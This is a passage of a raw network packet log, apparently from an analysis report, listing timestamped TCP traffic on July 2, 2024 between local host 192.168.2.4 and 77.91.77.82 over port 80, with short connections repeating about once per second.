                                            Jul 2, 2024 08:28:27.902121067 CEST6401680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:27.902295113 CEST6401780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:27.909006119 CEST806401777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:28.591330051 CEST806401777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:28.592289925 CEST6401780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:28.706334114 CEST6401780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:28.706334114 CEST6401880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:28.711224079 CEST806401877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:28.711473942 CEST806401777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:28.712250948 CEST6401780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:28.712250948 CEST6401880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:28.712479115 CEST6401880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:28.717191935 CEST806401877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:29.425815105 CEST806401877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:29.425892115 CEST6401880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:29.429533958 CEST6401880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:29.430022001 CEST6401980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:29.435154915 CEST806401877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:29.435173988 CEST806401977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:29.435206890 CEST6401880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:29.435266018 CEST6401980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:29.435534000 CEST6401980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:29.440558910 CEST806401977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:30.134907007 CEST806401977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:30.134970903 CEST6401980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:30.254019976 CEST6401980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:30.254504919 CEST6402080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:30.259722948 CEST806401977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:30.259772062 CEST6401980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:30.259782076 CEST806402077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:30.259838104 CEST6402080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:30.260164976 CEST6402080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:30.264949083 CEST806402077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:31.060774088 CEST806402077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:31.062294006 CEST6402080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.064918995 CEST6402080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.065303087 CEST6402180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.070158005 CEST806402077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:31.070194960 CEST806402177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:31.070290089 CEST6402180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.070292950 CEST6402080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.070574045 CEST6402180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.075350046 CEST806402177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:31.769907951 CEST806402177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:31.769968033 CEST6402180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.879340887 CEST6402180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.879815102 CEST6402280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.884763002 CEST806402177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:31.884778976 CEST806402277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:31.884828091 CEST6402180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.884864092 CEST6402280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.885169029 CEST6402280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:31.893132925 CEST806402277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:32.590830088 CEST806402277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:32.596302986 CEST6402280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:32.599123955 CEST6402280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:32.599127054 CEST6402380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:32.604027987 CEST806402377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:32.604310036 CEST806402277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:32.608248949 CEST6402380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:32.608248949 CEST6402280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:32.608503103 CEST6402380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:32.613267899 CEST806402377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:33.312416077 CEST806402377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:33.312525988 CEST6402380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:33.424721956 CEST6402380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:33.427196026 CEST6402480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:33.430636883 CEST806402377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:33.430691004 CEST6402380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:33.432153940 CEST806402477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:33.432275057 CEST6402480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:33.432593107 CEST6402480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:33.437344074 CEST806402477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:33.438000917 CEST6402480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:33.441196918 CEST6402580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:33.446028948 CEST806402577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:33.446093082 CEST6402580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:33.446451902 CEST6402580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:33.451240063 CEST806402577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:34.155004025 CEST806402577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:34.155062914 CEST6402580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.269639015 CEST6402580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.270028114 CEST6402680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.274838924 CEST806402677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:34.274857044 CEST806402577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:34.274935007 CEST6402580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.274935007 CEST6402680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.275402069 CEST6402680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.280186892 CEST806402677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:34.961213112 CEST806402677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:34.964411974 CEST6402680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.966830015 CEST6402680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.967189074 CEST6402780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.972024918 CEST806402777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:34.972172022 CEST806402677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:34.972297907 CEST6402780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.972331047 CEST6402680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.972554922 CEST6402780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:34.977408886 CEST806402777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:35.660587072 CEST806402777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:35.660645962 CEST6402780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:35.768765926 CEST6402780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:35.769088030 CEST6402880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:35.774379969 CEST806402777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:35.774390936 CEST806402877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:35.774445057 CEST6402780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:35.774734974 CEST6402880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:35.774734974 CEST6402880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:35.779520035 CEST806402877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:36.461421013 CEST806402877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:36.461559057 CEST6402880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:36.464493990 CEST6402880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:36.464498043 CEST6402980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:36.469360113 CEST806402977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:36.469477892 CEST6402980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:36.469574928 CEST806402877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:36.469671011 CEST6402880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:36.469779015 CEST6402980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:36.474616051 CEST806402977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:37.363393068 CEST806402977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:37.363684893 CEST6402980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:37.476829052 CEST6402980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:37.477149963 CEST6403080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:37.481937885 CEST806403077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:37.481997013 CEST6403080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:37.482028961 CEST806402977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:37.482067108 CEST6402980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:37.482202053 CEST6403080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:37.486917019 CEST806403077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:38.169363976 CEST806403077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:38.169430971 CEST6403080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.180370092 CEST6403080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.180763960 CEST6403180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.185672998 CEST806403177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:38.185749054 CEST6403180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.185806036 CEST806403077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:38.185852051 CEST6403080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.186132908 CEST6403180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.191301107 CEST806403177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:38.880000114 CEST806403177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:38.880109072 CEST6403180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.987406015 CEST6403180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.990355968 CEST6403280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.992679119 CEST806403177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:38.993016005 CEST6403180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.995296955 CEST806403277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:38.995383978 CEST6403280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:38.995649099 CEST6403280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:39.000410080 CEST806403277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:39.689605951 CEST806403277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:39.689677000 CEST6403280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:39.692851067 CEST6403280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:39.693172932 CEST6403380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:39.698654890 CEST806403277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:39.698669910 CEST806403377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:39.698702097 CEST6403280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:39.698761940 CEST6403380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:39.699167967 CEST6403380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:39.703902960 CEST806403377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:40.399029016 CEST806403377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:40.399117947 CEST6403380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:40.503305912 CEST6403380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:40.505501986 CEST6403480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:40.508968115 CEST806403377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:40.509135008 CEST6403380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:40.510430098 CEST806403477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:40.510647058 CEST6403480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:40.510922909 CEST6403480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:40.515646935 CEST806403477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:41.211572886 CEST806403477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:41.215636015 CEST6403480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:41.218554020 CEST6403580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:41.218645096 CEST6403480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:41.223460913 CEST806403577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:41.223866940 CEST806403477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:41.223983049 CEST6403580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:41.223994970 CEST6403480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:41.224298000 CEST6403580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:41.229024887 CEST806403577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:42.456830025 CEST806403577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:42.456850052 CEST806403577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:42.456861019 CEST806403577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:42.456927061 CEST6403580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:42.456927061 CEST6403580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:42.565711021 CEST6403580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:42.565762997 CEST6403680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:42.570709944 CEST806403677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:42.571163893 CEST806403577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:42.571254015 CEST6403580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:42.571257114 CEST6403680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:42.571511984 CEST6403680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:42.576407909 CEST806403677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:43.286710024 CEST806403677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:43.286998987 CEST6403680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:43.291964054 CEST6403680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:43.292577028 CEST6403780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:43.297094107 CEST806403677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:43.297293901 CEST6403680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:43.297348976 CEST806403777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:43.297504902 CEST6403780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:43.299629927 CEST6403780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:43.304436922 CEST806403777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:43.990112066 CEST806403777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:43.990175009 CEST6403780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.097923040 CEST6403780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.098280907 CEST6403880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.103085995 CEST806403877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:44.103149891 CEST6403880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.103346109 CEST806403777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:44.103393078 CEST6403780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.103450060 CEST6403880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.108316898 CEST806403877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:44.109970093 CEST6403880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.113786936 CEST6403980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.118666887 CEST806403977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:44.118750095 CEST6403980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.118877888 CEST6403980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.123641014 CEST806403977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:44.827042103 CEST806403977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:44.827168941 CEST6403980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.941549063 CEST6403980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.941932917 CEST6404080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.946893930 CEST806403977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:44.946917057 CEST806404077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:44.947027922 CEST6403980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.947027922 CEST6404080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.951704979 CEST6404080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:44.957473993 CEST806404077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:45.670399904 CEST806404077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:45.670461893 CEST6404080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:45.674736023 CEST6404080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:45.675023079 CEST6404180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:45.679912090 CEST806404177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:45.679985046 CEST6404180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:45.680001974 CEST806404077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:45.680056095 CEST6404080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:45.680202961 CEST6404180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:45.685205936 CEST806404177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:46.369479895 CEST806404177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:46.369548082 CEST6404180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.487514019 CEST6404180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.488646984 CEST6404280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.493350983 CEST806404177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:46.493458033 CEST6404180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.493479013 CEST806404277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:46.493758917 CEST6404280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.493949890 CEST6404280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.498648882 CEST806404277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:46.500421047 CEST6404280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.500453949 CEST6404280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.505485058 CEST6404380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.510365963 CEST806404377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:46.510561943 CEST6404380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.510711908 CEST6404380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:46.515433073 CEST806404377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:47.225044966 CEST806404377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:47.228274107 CEST6404380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:47.346925020 CEST6404480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:47.346930027 CEST6404380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:47.351825953 CEST806404477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:47.352186918 CEST806404377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:47.352216959 CEST6404480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:47.352273941 CEST6404380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:47.352855921 CEST6404480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:47.357605934 CEST806404477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:48.054442883 CEST806404477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:48.054505110 CEST6404480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.058387995 CEST6404480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.058749914 CEST6404580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.063541889 CEST806404477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:48.063555956 CEST806404577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:48.063607931 CEST6404480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.063692093 CEST6404580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.064071894 CEST6404580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.068869114 CEST806404577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:48.761739969 CEST806404577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:48.761882067 CEST6404580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.878137112 CEST6404580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.878499031 CEST6404680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.883327007 CEST806404677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:48.883414984 CEST806404577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:48.883529902 CEST6404580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.883529902 CEST6404680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.883699894 CEST6404680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.888519049 CEST806404677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:48.891237974 CEST6404680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.894149065 CEST6404780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.898929119 CEST806404777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:48.899079084 CEST6404780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.899233103 CEST6404780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:48.904093027 CEST806404777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:49.614959955 CEST806404777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:49.615029097 CEST6404780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:49.722249031 CEST6404780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:49.722809076 CEST6404880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:49.738214016 CEST6404980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:49.824508905 CEST806404877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:49.824528933 CEST806404977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:49.824588060 CEST6404880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:49.824629068 CEST6404980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:49.824999094 CEST6404980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:49.825093985 CEST806404777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:49.825146914 CEST6404780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:49.829821110 CEST806404977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:50.540194988 CEST806404977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:50.542731047 CEST6404980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:50.659262896 CEST6404980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:50.662295103 CEST6405080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:50.667279959 CEST806405077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:50.667315006 CEST806404977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:50.670237064 CEST6404980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:50.670237064 CEST6405080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:50.670402050 CEST6405080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:50.675189972 CEST806405077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:51.916229963 CEST806405077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:51.916295052 CEST6405080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:51.916369915 CEST806405077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:51.916414976 CEST6405080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:51.916579008 CEST806405077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:51.916615963 CEST6405080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:51.920403004 CEST6405080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:51.920754910 CEST6405180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:51.925467014 CEST806405077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:51.925519943 CEST6405080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:51.925535917 CEST806405177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:51.925599098 CEST6405180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:51.925894976 CEST6405180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:51.930597067 CEST806405177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:52.630351067 CEST806405177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:52.632227898 CEST6405180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:52.737386942 CEST6405180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:52.740183115 CEST6405280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:52.744298935 CEST806405177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:52.746825933 CEST806405277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:52.748243093 CEST6405180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:52.748246908 CEST6405280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:52.748477936 CEST6405280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:52.755023956 CEST806405277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:53.445485115 CEST806405277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:53.448231936 CEST6405280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:53.451025963 CEST6405280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:53.451030016 CEST6405380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:53.455945015 CEST806405377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:53.456264973 CEST6405380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:53.456346989 CEST806405277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:53.460144997 CEST6405380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:53.460258007 CEST6405280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:53.465140104 CEST806405377.91.77.82192.168.2.4
